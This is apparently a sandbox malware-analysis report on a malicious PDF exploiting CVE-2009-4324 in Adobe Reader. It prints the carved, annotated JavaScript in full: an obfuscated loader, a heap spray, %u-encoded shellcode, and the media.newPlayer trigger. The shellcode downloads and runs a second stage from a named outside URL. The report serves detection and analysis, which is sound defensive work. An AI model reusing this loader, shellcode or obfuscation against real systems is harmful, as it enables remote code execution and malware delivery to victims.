Malicious PDF — malware analysis report

Static analysis result for SHA-256 f416e724031679da…

MALICIOUS

PDF

46.2 KB First seen: 2026-05-10
MD5: 2f87d17862a740e36b1cb1107894a49d SHA-1: c0798ed99883bff6691b73bab43349081c2444f3 SHA-256: f416e724031679da66fa0d3ad2b6158156fd7e969513cf8c36ffd5366757077c
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that leverages the CVE-2009-4324 vulnerability via the media.newPlayer API. This script is designed to download and execute a second-stage payload from the URL http://splo.in/x/p.php?e=8&&. The ML classifier strongly indicates maliciousness, and the exploit technique is well-defined.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://splo.in/x/p.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2578 bytes
SHA-256: b6444aa3e8f1aac4afe3569f1f2f42b252d328a535e0b7278a6e86278d1d8302
Preview script
First 1,000 lines of the extracted script
// Stage-1 loader as carved from the /JS stream (analyst annotations added; code unchanged).
// Two single-character constants used to assemble API names piecewise: ppp ("%") is also the
// replacement token for the marker regex later on, ppp2 ("a") supplies the letter "a".
var ppp = ""+"%";
var ppp2 = ""+"a";
// Returns one character per selector; the inline /*iii9d99999999iii*/ comments are filler.
//   1 -> second character of app["viewerTy" + app.doc.URL[3] + "e"]; this is app.viewerType[1]
//        only when the 4th character of the document URL is "p" (e.g. an http:// URL), so the
//        script is keyed to how the document was opened. The lookups in the main body only
//        spell real API names if this returns "e" — TODO confirm which viewerType values qualify.
//   2 -> "%"
//   3 -> "a"
//   any other selector -> undefined
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+ /*iii9d99999999iii*/    app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/  );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return (  /*iii9d99999999iii*/ ""+  /*iii9d99999999iii*/  ppp    /*iii9d99999999iii*/  );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+  /*iii9d99999999iii*/      ppp2 /*iii9d99999999iii*/);
}

// Alias for `this`; used below for computed-name property lookups (eval, unescape).
var /*iii9d99999999iii*/vOMKWABITK77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/

// Character table for spelling API names one letter at a time.
// [1] is the environment-derived character (expected "e"), [2] = "%", [3] = "a",
// [6..15] = o s c i g t r u n p. Static scanners that key on literal API names see none of them.
var BoRfThvqiP89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/

// Alias for the Acrobat `app` object.
var /*iii9d99999999iii*/vOMKWABITK77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
// OdUEQvQtGy1 = table[1] (expected "e"); gqPZTKvvui3 = "%".
var OdUEQvQtGy1 = BoRfThvqiP89[1];
/*iii9d99999999iii*/
var gqPZTKvvui3 = BoRfThvqiP89[2];
/*iii9d99999999iii*/
// "e"+"v"+"a"+"l" -> this["eval"]
var ZtLjdOuRvq17 = vOMKWABITK77[OdUEQvQtGy1+"v"+BoRfThvqiP89[3]+"l"];
/*iii9d99999999iii*/
// "u"+"n"+"e"+"s"+"c"+"a"+"p"+"e" -> this["unescape"]
var KXcDSAYVgx18 = vOMKWABITK77[BoRfThvqiP89[13]+BoRfThvqiP89[14]+OdUEQvQtGy1+"s"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+BoRfThvqiP89[15]+OdUEQvQtGy1];
/*iii9d99999999iii*/

// eval("var clsuYUDfZk15 = /hi av haxc/ig;") — defines the marker regex via eval so the
// marker string never appears as a regex literal in the static script. The same
// "hi av haxc" token is visible in the report's dump of PDF object 7 above.
ZtLjdOuRvq17("v"+BoRfThvqiP89[3]+"r clsuYUDfZk15 = /hi av hax"+BoRfThvqiP89[8]+"/"+BoRfThvqiP89[9]+BoRfThvqiP89[10]+";");
/*iii9d99999999iii*/
// app["d"+"o"+"c"] -> app.doc
var xmXfyraldz10 = vOMKWABITK77z[/*iii9d99999999iii*/     "d"+BoRfThvqiP89[7-1]+BoRfThvqiP89[7+1]];
/*iii9d99999999iii*/
// app.doc["syncAnnotScan"]() — forces annotation enumeration before getAnnots.
xmXfyraldz10[BoRfThvqiP89[7]+"yn"+BoRfThvqiP89[8]+"A"+BoRfThvqiP89[14]+BoRfThvqiP89[14]+"o"+BoRfThvqiP89[11]+"S"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+"n"]();
/*iii9d99999999iii*/
// app.doc["getAnnots"](0) — annotations on page 0 carry the encoded next stage.
var BILVNcRdVX4 = xmXfyraldz10[BoRfThvqiP89[10]+OdUEQvQtGy1+"tAnn"+BoRfThvqiP89[6]+BoRfThvqiP89[11]+BoRfThvqiP89[7]](0);
 /*iii9d99999999iii*/
// annots[0]["subject"] — the payload text is stored in the first annotation's /Subj field.
var blECsYzdPr5 = BILVNcRdVX4[0][BoRfThvqiP89[7]+"ubj"+OdUEQvQtGy1+BoRfThvqiP89[8]+BoRfThvqiP89[11]];
  /*iii9d99999999iii*/
// subject["replace"](/hi av haxc/ig, "%") — every marker becomes "%", turning the
// "hi av haxc25hi av haxc30..." text into a %XX-escaped string.
var FwiVVBfRwa6 = blECsYzdPr5/*iii9d99999999iii*/[BoRfThvqiP89/*iii9d99999999iii*/[11+1]+OdUEQvQtGy1+/*iii9d99999999iii*/BoRfThvqiP89[15]+"l"/*iii9d99999999iii*/+BoRfThvqiP89/*iii9d99999999iii*/[3]+BoRfThvqiP89/*iii9d99999999iii*/[8]+OdUEQvQtGy1]/*iii9d99999999iii*/(clsuYUDfZk15,gqPZTKvvui3);
/*iii9d99999999iii*/
// unescape(unescape(...)) — the stored text is double percent-encoded; then eval the result.
// The decoded stage presumably corresponds to the legacy_pdfkit_stage_000.js artifact in this
// report (defines j, vvv, vvv2, vvv3, vvv4 used below) — confirm against the carved file.
var AxiLTvnlYJ7=KXcDSAYVgx18(KXcDSAYVgx18(FwiVVBfRwa6));
ZtLjdOuRvq17(AxiLTvnlYJ7);

// Runs only if the decoded stage set j (it is version-gated there). util[vvv2] is
// util.printd, this[vvv4][vvv3](null) is media.newPlayer(null) — the call the report's
// CVE-2009-4324 heuristic keys on. The empty catch hides any exception from the viewer,
// so a failed trigger produces no user-visible error.
if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
javascript_obj0008_001.js pdf-javascript-stream PDF /JS object 8 at offset 0x209 46806 bytes
SHA-256: e934c21a03ba5afbb68f58a414250414d189821fca2cb6916e2fe4945827fe0c
Preview script
First 1,000 lines of the extracted script
// Second carve of the same stage-1 loader (identical to javascript_obj0008_000.js above).
// Two single-character constants used to assemble API names piecewise: ppp ("%") is also the
// replacement token for the marker regex later on, ppp2 ("a") supplies the letter "a".
var ppp = ""+"%";
var ppp2 = ""+"a";
// Returns one character per selector; the inline /*iii9d99999999iii*/ comments are filler.
//   1 -> second character of app["viewerTy" + app.doc.URL[3] + "e"]; this is app.viewerType[1]
//        only when the 4th character of the document URL is "p" (e.g. an http:// URL), so the
//        script is keyed to how the document was opened. The lookups in the main body only
//        spell real API names if this returns "e" — TODO confirm which viewerType values qualify.
//   2 -> "%"
//   3 -> "a"
//   any other selector -> undefined
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+ /*iii9d99999999iii*/    app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/  );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return (  /*iii9d99999999iii*/ ""+  /*iii9d99999999iii*/  ppp    /*iii9d99999999iii*/  );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+  /*iii9d99999999iii*/      ppp2 /*iii9d99999999iii*/);
}

// Alias for `this`; used below for computed-name property lookups (eval, unescape).
var /*iii9d99999999iii*/vOMKWABITK77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/

// Character table for spelling API names one letter at a time.
// [1] is the environment-derived character (expected "e"), [2] = "%", [3] = "a",
// [6..15] = o s c i g t r u n p. Static scanners that key on literal API names see none of them.
var BoRfThvqiP89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/

// Alias for the Acrobat `app` object.
var /*iii9d99999999iii*/vOMKWABITK77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
// OdUEQvQtGy1 = table[1] (expected "e"); gqPZTKvvui3 = "%".
var OdUEQvQtGy1 = BoRfThvqiP89[1];
/*iii9d99999999iii*/
var gqPZTKvvui3 = BoRfThvqiP89[2];
/*iii9d99999999iii*/
// "e"+"v"+"a"+"l" -> this["eval"]
var ZtLjdOuRvq17 = vOMKWABITK77[OdUEQvQtGy1+"v"+BoRfThvqiP89[3]+"l"];
/*iii9d99999999iii*/
// "u"+"n"+"e"+"s"+"c"+"a"+"p"+"e" -> this["unescape"]
var KXcDSAYVgx18 = vOMKWABITK77[BoRfThvqiP89[13]+BoRfThvqiP89[14]+OdUEQvQtGy1+"s"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+BoRfThvqiP89[15]+OdUEQvQtGy1];
/*iii9d99999999iii*/

// eval("var clsuYUDfZk15 = /hi av haxc/ig;") — defines the marker regex via eval so the
// marker string never appears as a regex literal in the static script. The same
// "hi av haxc" token is visible in the report's dump of PDF object 7 below.
ZtLjdOuRvq17("v"+BoRfThvqiP89[3]+"r clsuYUDfZk15 = /hi av hax"+BoRfThvqiP89[8]+"/"+BoRfThvqiP89[9]+BoRfThvqiP89[10]+";");
/*iii9d99999999iii*/
// app["d"+"o"+"c"] -> app.doc
var xmXfyraldz10 = vOMKWABITK77z[/*iii9d99999999iii*/     "d"+BoRfThvqiP89[7-1]+BoRfThvqiP89[7+1]];
/*iii9d99999999iii*/
// app.doc["syncAnnotScan"]() — forces annotation enumeration before getAnnots.
xmXfyraldz10[BoRfThvqiP89[7]+"yn"+BoRfThvqiP89[8]+"A"+BoRfThvqiP89[14]+BoRfThvqiP89[14]+"o"+BoRfThvqiP89[11]+"S"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+"n"]();
/*iii9d99999999iii*/
// app.doc["getAnnots"](0) — annotations on page 0 carry the encoded next stage.
var BILVNcRdVX4 = xmXfyraldz10[BoRfThvqiP89[10]+OdUEQvQtGy1+"tAnn"+BoRfThvqiP89[6]+BoRfThvqiP89[11]+BoRfThvqiP89[7]](0);
 /*iii9d99999999iii*/
// annots[0]["subject"] — the payload text is stored in the first annotation's /Subj field.
var blECsYzdPr5 = BILVNcRdVX4[0][BoRfThvqiP89[7]+"ubj"+OdUEQvQtGy1+BoRfThvqiP89[8]+BoRfThvqiP89[11]];
  /*iii9d99999999iii*/
// subject["replace"](/hi av haxc/ig, "%") — every marker becomes "%", turning the
// "hi av haxc25hi av haxc30..." text into a %XX-escaped string.
var FwiVVBfRwa6 = blECsYzdPr5/*iii9d99999999iii*/[BoRfThvqiP89/*iii9d99999999iii*/[11+1]+OdUEQvQtGy1+/*iii9d99999999iii*/BoRfThvqiP89[15]+"l"/*iii9d99999999iii*/+BoRfThvqiP89/*iii9d99999999iii*/[3]+BoRfThvqiP89/*iii9d99999999iii*/[8]+OdUEQvQtGy1]/*iii9d99999999iii*/(clsuYUDfZk15,gqPZTKvvui3);
/*iii9d99999999iii*/
// unescape(unescape(...)) — the stored text is double percent-encoded; then eval the result.
// The decoded stage presumably corresponds to the legacy_pdfkit_stage_000.js artifact in this
// report (defines j, vvv, vvv2, vvv3, vvv4 used below) — confirm against the carved file.
var AxiLTvnlYJ7=KXcDSAYVgx18(KXcDSAYVgx18(FwiVVBfRwa6));
ZtLjdOuRvq17(AxiLTvnlYJ7);

// Runs only if the decoded stage set j (it is version-gated there). util[vvv2] is
// util.printd, this[vvv4][vvv3](null) is media.newPlayer(null) — the call the report's
// CVE-2009-4324 heuristic keys on. The empty catch hides any exception from the viewer,
// so a failed trigger produces no user-visible error.
if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 43920
>>
stream
hi av haxc25hi av haxc30hi av haxc41hi av haxc25hi av haxc37hi av haxc36hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc37hi av haxc32hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc35hi av haxc30hi av haxc25hi av haxc36hi av haxc43hi av haxc25hi av haxc37hi av haxc35hi av haxc25hi av haxc36hi av haxc37hi av haxc25hi av haxc36hi av haxc39hi av haxc25hi av haxc36hi av haxc45hi av haxc25hi av haxc37hi av haxc33hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc33hi av haxc44hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc37hi av haxc30hi av haxc25hi av haxc37hi av haxc30hi av haxc25hi av haxc32hi av haxc45hi av haxc25hi av haxc37hi av haxc30hi av haxc25hi av haxc36hi av haxc43hi av haxc25hi av haxc37hi av haxc35hi av haxc25hi av haxc36hi av haxc37hi av haxc25hi av haxc34hi av haxc39hi av haxc25hi av haxc36hi av haxc45hi av haxc25hi av haxc37hi av haxc33hi av haxc25hi av haxc33hi av haxc42hi av haxc25hi av haxc30hi av haxc41hi av haxc25hi av haxc36hi av haxc36hi av haxc25hi av haxc36hi av haxc46hi av haxc25hi av haxc37hi av haxc32hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc32hi av haxc38hi av haxc25hi av haxc37hi av haxc36hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc37hi av haxc32hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc36hi av haxc39hi av haxc25hi av haxc33hi av haxc44hi av haxc25hi av haxc33hi
... (truncated)
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xC2D 1220 bytes
SHA-256: d7155f873b59e589a73c704be477a30cf4921d43cb2c81abc4b0960cad6f3280
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Decoded stage (the text the loader recovers by double-unescape and evals). It fingerprints
// the viewer, prepares the spray buffers, and defines the aliases the loader's trailing
// `if(j){...}` block consumes. Analyst annotations added; code unchanged.
var aPlugins = app.plugIns;
// Find the EScript (JavaScript engine) plug-in and take its version as the Reader version.
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
// Version gate: j (number of spray blocks) is set only for 9 < lv < 9.3 (1400) or
// 8.12 < lv < 8.2 (2900). On any other version j stays undefined, so the loader's `if(j)`
// never fires — a sandbox that does not present a matching version will not observe the
// trigger, which matters when reproducing this sample dynamically.
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
// %uXXXX-escaped payload (little-endian UTF-16 pairs, as the report's
// PDF_JS_SHELLCODE_DOWNLOAD_URL finding describes). The trailing run %u7468 ... %u2626 is
// the encoding of the second-stage URL listed in the EMBEDDED_URL finding above; the
// %u7275 ... %u0065 run appears to spell "urlmon.dll" followed by a short C:\ drop path
// (hand-decoded by reviewer — confirm), consistent with the URLDownloadToFile-style
// downloader assessment in the report.
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u732F%u6C70%u2E6F%u6E69%u782F%u702F%u702E%u7068%u653F%u383D%u2626";
// 0x9090 filler (x86 NOP sled); doubled until it exceeds 0x8000 UTF-16 units, then cut so
// that str + sh is exactly 0x8000 units long.
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
// Keep j copies of the sled+payload block alive in s — the heap-spray layout the report's
// exploit-shellcode heuristic refers to.
for(i=0;i<j;i++) {s[i]=str + sh;}
// Aliases consumed by the loader: util[vvv2](vvv, new Date()) is util.printd(...), and
// this[vvv4][vvv3](null) is media.newPlayer(null), the CVE-2009-4324 trigger named in the
// report. vvv is the format string handed to printd; its meaning beyond that is not
// established here.
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
SHA-256: 42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414
Preview script
First 1,000 lines of the extracted script
// Resolved form of the loader's this[vvv4][vvv3](null) call, with vvv4 = "media" and
// vvv3 = "newPlayer" taken from the decoded stage above; this is the call the report's
// CVE-2009-4324 heuristic matches on.
media.newPlayer(null); /* alias values recovered from decoded annotation stage */